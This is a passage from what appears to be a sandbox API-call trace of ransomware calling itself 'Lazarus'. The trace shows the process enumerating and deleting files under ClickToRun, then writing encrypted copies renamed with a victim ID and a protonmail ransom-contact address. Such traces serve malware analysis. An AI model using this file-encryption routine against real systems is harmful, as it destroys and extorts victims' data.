92 [0089.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0089.472] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0089.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.473] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0089.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0089.474] AreFileApisANSI () returned 1 [0089.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 90 [0089.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0089.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0089.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0089.475] AreFileApisANSI () returned 1 [0089.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0089.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0089.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0089.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.475] GetFileType (hFile=0x360) returned 0x1 [0089.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.475] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.475] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.476] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.476] CloseHandle (hObject=0x360) returned 1 [0089.476] AreFileApisANSI () returned 1 [0089.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0089.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0089.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0089.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.476] GetFileType (hFile=0x360) returned 0x1 [0089.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.476] CloseHandle (hObject=0x360) returned 1 [0089.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0089.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0089.478] AreFileApisANSI () returned 1 [0089.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0089.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0089.478] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.478] AreFileApisANSI () returned 1 [0089.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0089.478] GetLastError () returned 0x0 [0089.478] SetLastError (dwErrCode=0x0) [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0089.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0089.479] GetLastError () returned 0x0 [0089.479] SetLastError (dwErrCode=0x0) [0089.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8ad80 [0089.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0089.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0089.479] AreFileApisANSI () returned 1 [0089.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 152 [0089.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x130) returned 0x4e568 [0089.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=152 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 152 [0089.479] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.479] GetFileType (hFile=0x360) returned 0x1 [0089.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0089.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.480] AreFileApisANSI () returned 1 [0089.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0089.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0089.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0089.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.480] GetFileType (hFile=0x348) returned 0x1 [0089.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0089.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0089.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0089.480] GetLastError () returned 0x0 [0089.480] SetLastError (dwErrCode=0x0) [0089.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0089.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0089.481] GetLastError () returned 0x0 [0089.481] SetLastError (dwErrCode=0x0) [0089.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0089.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0089.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0089.481] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0089.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0089.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0089.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0089.483] GetLastError () returned 0x0 [0089.483] SetLastError (dwErrCode=0x0) [0089.483] GetLastError () returned 0x0 [0089.483] SetLastError (dwErrCode=0x0) [0089.483] GetLastError () returned 0x0 [0089.483] SetLastError (dwErrCode=0x0) [0089.483] GetLastError () returned 0x0 [0089.483] SetLastError (dwErrCode=0x0) [0089.483] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.484] WriteFile (in: hFile=0x360, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.485] GetLastError () returned 0x0 [0089.485] SetLastError (dwErrCode=0x0) [0089.485] GetLastError () returned 0x0 [0089.485] SetLastError (dwErrCode=0x0) [0089.485] GetLastError () returned 0x0 [0089.485] SetLastError (dwErrCode=0x0) [0089.485] GetLastError () returned 0x0 [0089.485] SetLastError (dwErrCode=0x0) [0089.485] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.486] WriteFile (in: hFile=0x360, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, 